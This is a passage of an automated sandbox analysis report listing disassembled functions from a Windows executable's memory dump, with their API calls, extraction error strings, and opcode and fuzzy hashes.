                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D271AC31A1C6C685EBA2FB64E5502F923E0FB58784F444131E98DC77DAEF2EE5468B04

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                          • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                          • Opcode ID: b407304f59c8fed8e80953ab1446060df87242f28b87016e8bc065588a071b4b
                                                                                                                                                                                                                          • Instruction ID: 171ffaf35e7d3c65d70412a763a60c2270fbfa00c15cab0ce9641801f6c2caed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b407304f59c8fed8e80953ab1446060df87242f28b87016e8bc065588a071b4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B241AE21B0C68281FBA2BB55A9411FA63E0FF54794F484031DA4E87AD6EF3DE5078708

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                          • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                          • Opcode ID: aaa6e2f1d8ba90dcc4eddcd4f4e0a7b2b807957a0759b3b30b192466de30692a
                                                                                                                                                                                                                          • Instruction ID: c312a6d2c1767073aede0e2e19b850bd1955c0469c60c5991906d2070224f392
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6e2f1d8ba90dcc4eddcd4f4e0a7b2b807957a0759b3b30b192466de30692a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B51BF62A0C68281EBA2BB95A8503FA62D1BB85794F444135ED4DC7BD6EF3DE9038704

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF641F3E3BA,?,?,-00000018,00007FF641F3A063,?,?,?,00007FF641F39F5A,?,?,?,00007FF641F3524E), ref: 00007FF641F3E19C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF641F3E3BA,?,?,-00000018,00007FF641F3A063,?,?,?,00007FF641F39F5A,?,?,?,00007FF641F3524E), ref: 00007FF641F3E1A8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                          • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                          • Instruction ID: 5e78e2612ef6a5baa1b3e86634168ebf7101213be96f47287991743ce728c4d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5418932B1DA0681EB97BB16AD006A662D2BF45BA0F484135DD1DC7BC6EE3DE4478205

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 26238c2e26fe11b5dd28e2edceea188fc7e899d5cf6690fdc612c94b7bf022f2
                                                                                                                                                                                                                          • Instruction ID: 101781c4f2b699e765868135dd38c4f1c1251a900781384f408d35ba28d4b7ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26238c2e26fe11b5dd28e2edceea188fc7e899d5cf6690fdc612c94b7bf022f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C1F172A1C68F91EBA2BB5594102BE7BD0FB90B80F550131DA4E83BD1CE7CE8578316

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF641F23534), ref: 00007FF641F23411
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: GetLastError.KERNEL32(?,?,?,00007FF641F2342E,?,00007FF641F23534), ref: 00007FF641F22A14
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: FormatMessageW.KERNEL32(?,?,?,00007FF641F2342E), ref: 00007FF641F22A7D
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F229E0: MessageBoxW.USER32 ref: 00007FF641F22ACF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                          • API String ID: 517058245-2863816727
                                                                                                                                                                                                                          • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                          • Instruction ID: f1e14e5795f950f91e9bfbd4dfbd519f084b6c86a3b3b691a430538115aa4bf7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9521B0A1B1C58281FBA3BB24E9013FA22D0BF98384F800232D65DC75E6EE2DE1068301

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                          • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                                          • Instruction ID: 6cff7036f5c92209949a72643f0579714840af396a243bcfe636c0d5a5be222f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6511372F0861A8AEB95FF6499552BC27E1AF10798F110135DD1E93EE6DF38A443C702
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
• Associated: 00000015.00000002.2281800474.00007FF8B8300000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000015.00000002.2282199485.00007FF8B83EF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000015.00000002.2282289251.00007FF8B83F2000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8b8300000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$__security_init_cookie
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2222513578-0
                                                                                                                                                                                                                          • Opcode ID: d32f32be829c345f8424b6e50172c33a4feb856c6a1ec6dc64b44a65f2bf0592
                                                                                                                                                                                                                          • Instruction ID: c2ca61d711092ae3e39f99b9fd34e8f8a558f289c1622a4ab68342770e3c2706
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d32f32be829c345f8424b6e50172c33a4feb856c6a1ec6dc64b44a65f2bf0592
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12515D20E0C64342FA9977EDD95517A51919F4DBE0F1C4638DB2E06AD7EF2DB8838708
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                                                                                          • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                                                          • Instruction ID: 53cff9c26b31722431c03e534cee2c21a71ba83ca0f055b91b7fcecc594d4744
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99517822A0C6458AFB95FFB1D4403BD23E1AB48B98F148135DE0987A89DF38D4838752
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                          • Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                                          • Instruction ID: 4040b9923be3e93d8bd9114e31f88e817aa0b24e0a5af294847f2ca812f45ac0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D41A122D1C78643F795BBA0D54036962A0FBA47A4F109334E69D83ED6DF6CA1E38705
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B830DCF0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF8B83134C9,?,?,?,00007FF8B83539B1,?,?,?,?,00007FF8B83178EA,?,?,?), ref: 00007FF8B830DD38
                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF8B831F39E,?,?,?,?,?,00007FF8B831F0A6), ref: 00007FF8B8355B8C
                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,?,00007FF8B831F39E,?,?,?,?,?,00007FF8B831F0A6), ref: 00007FF8B8355BA2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
• Associated: 00000015.00000002.2281800474.00007FF8B8300000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000015.00000002.2282199485.00007FF8B83EF000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000015.00000002.2282289251.00007FF8B83F2000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8b8300000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressAllocCountCriticalHeapInitializeProcSectionSpin
                                                                                                                                                                                                                          • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                                          • API String ID: 1188775705-3084827643
                                                                                                                                                                                                                          • Opcode ID: d50c9835e02574957e0a21de02abdf2f731f597d5daf9e2beef02907001a061a
                                                                                                                                                                                                                          • Instruction ID: 5084107b5da655707eecee163dd94cd577e372775673c9b5efc36ec17bd9273a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d50c9835e02574957e0a21de02abdf2f731f597d5daf9e2beef02907001a061a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF41AC62B19B4286EA149B5DD4142B933A0AB48BA0F4C4335DB6D477C4DF3CF917C308
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
• Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                          • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                          • Instruction ID: 675b66790f364f538da22db98ad6d6ecc0820223435f8e1ddf0d839f3399cdc4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7314D39E4D68741FBE6FB6494123F913C1AF82784F940035E90EC76D7EE2EA9478215
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                          • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                          • Instruction ID: 60c450ef61f47b9ced75b986fde826f1f04bf96ab2ee56ff5c4ac135ec4324c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81D06720F6C60A87EB963F715D6917912915FA8701B502538D84A877D3CD2CA80B4345
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                                                          • Instruction ID: cac679e86ffda5a4bc88c4ceec7fe49bc8ecb48b84267d7e0491c92ed747f9d7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C51D161B2D2C246EBAABF3694106BA66C1FF84BB4F144634DD6D87BD5CE3DE4038601
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                          • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                          • Instruction ID: f128860154aa27e4d48308c8272b7740cf3e3c34ce5dcea41019620460c01a14
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B411C471A1CA8581DB91BB25E81417D63A1AB44BF4F544331EE7D87BEACE3CD0538709
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF641F34B49), ref: 00007FF641F34C67
                                                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF641F34B49), ref: 00007FF641F34C7D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1707611234-0
                                                                                                                                                                                                                          • Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                                          • Instruction ID: fed6e6f6fad72cd7e93c34006b96b0df5a44a195bbb750e261087ec2eb9c865e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D118F3160CA5681EBA5BB51E41117EB7E0FB817A5F500235EAADC2DD8EF2CD056DB00
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
